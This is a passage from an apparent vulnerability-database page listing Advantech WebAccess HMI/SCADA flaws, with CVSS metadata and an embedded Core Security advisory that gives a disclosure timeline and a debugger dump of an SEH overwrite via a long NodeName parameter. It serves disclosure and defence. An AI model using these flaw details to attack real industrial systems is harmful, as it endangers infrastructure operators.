"ca3e2eb5-bc1d-4ee8-91f5-7a25e18dd5f4" }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32470" }, { "date": "2019-09-18T00:00:00", "db": "VULHUB", "id": "VHN-145408" }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "date": "2019-09-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-833" }, { "date": "2019-09-18T21:15:12.937000", "db": "NVD", "id": "CVE-2019-13550" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32470" }, { "date": "2020-10-16T00:00:00", "db": "VULHUB", "id": "VHN-145408" }, { "date": "2019-09-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-009505" }, { "date": "2020-10-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201909-833" }, { "date": "2024-11-21T04:25:07.720000", "db": "NVD", "id": "CVE-2019-13550" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-833" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WebAccess Vulnerable to unauthorized authentication", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-009505" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201909-833" } ], "trust": 0.6 } }
var-201810-0401
Vulnerability from variot
Advantech WebAccess 8.3.1 and earlier has an improper privilege management vulnerability, which may allow an attacker to access those files and perform actions at a system administrator level. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. Advantech WebAccess has an improper rights management vulnerability. Advantech WebAccess is prone to the following security vulnerabilities: 1. A stack-based buffer overflow vulnerability 2. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0401", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011087" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1319" } ], "trust": 0.7 }, "cve": "CVE-2018-14828", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2018-14828", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21934", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "VHN-125026", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-14828", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-14828", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-14828", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-14828", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2018-14828", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-21934", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201810-1190", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-125026", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "VULHUB", "id": "VHN-125026" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.3.1 and earlier has an improper privilege management vulnerability, which may allow an attacker to access those files and perform actions at a system administrator level. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the access control that is set and modified during the installation of the product. The product installation weakens access control restrictions of pre-existing system files and sets weak access control restrictions on new files. Advantech (Advantech) WebAccess software is the core of Advantech\u0027s IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. Advantech WebAccess has an improper rights management vulnerability. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A stack-based buffer overflow vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary-file-deletion vulnerability\n4. This may aid in further attacks. \nAdvantech WebAccess 8.3.1 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-14828" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "BID", "id": "105728" }, { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125026" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-14828", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-296-01", "trust": 3.4 }, { "db": "BID", "id": "105728", "trust": 2.6 }, { "db": "SECTRACK", "id": "1041939", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201810-1190", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-21934", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011087", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-6828", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-1319", "trust": 0.7 }, { "db": "IVD", "id": "E2FEC8D1-39AB-11E9-B5CC-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125026", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "VULHUB", "id": "VHN-125026" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "id": "VAR-201810-0401", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "VULHUB", "id": "VHN-125026" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21934" } ] }, "last_update_date": "2024-11-23T22:06:35.934000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "https://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01" }, { "title": "Patch for Advantech WebAccess Improper Rights Management Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143391" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86282" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-269", "trust": 1.1 }, { "problemtype": "CWE-264", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125026" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/105728" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1041939" }, { "trust": 1.0, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01%2c" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14828" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14828" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-296-01," } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "VULHUB", "id": "VHN-125026" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1319" }, { "db": "CNVD", "id": "CNVD-2018-21934" }, { "db": "VULHUB", "id": "VHN-125026" }, { "db": "BID", "id": "105728" }, { "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "db": "NVD", "id": "CVE-2018-14828" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-28T00:00:00", "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "date": "2018-10-25T00:00:00", "db": "ZDI", "id": "ZDI-18-1319" }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21934" }, { "date": "2018-10-23T00:00:00", "db": "VULHUB", "id": "VHN-125026" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "date": "2018-10-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "date": "2018-10-23T20:29:00.717000", "db": "NVD", "id": "CVE-2018-14828" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-10-25T00:00:00", "db": "ZDI", "id": "ZDI-18-1319" }, { "date": "2018-10-28T00:00:00", "db": "CNVD", "id": "CNVD-2018-21934" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-125026" }, { "date": "2018-10-23T00:00:00", "db": "BID", "id": "105728" }, { "date": "2019-01-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011087" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1190" }, { "date": "2024-11-21T03:49:52.993000", "db": "NVD", "id": "CVE-2018-14828" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1190" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Improper Rights Management Vulnerability", "sources": [ { "db": "IVD", "id": "e2fec8d1-39ab-11e9-b5cc-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-21934" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control issues", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1190" } ], "trust": 0.6 } }
var-201409-0440
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the GotoCmd parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software featuring all engineering projects, database setup, drawing and software management using standard browsers over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0440", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "d29073fe-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05421" }, { "db": 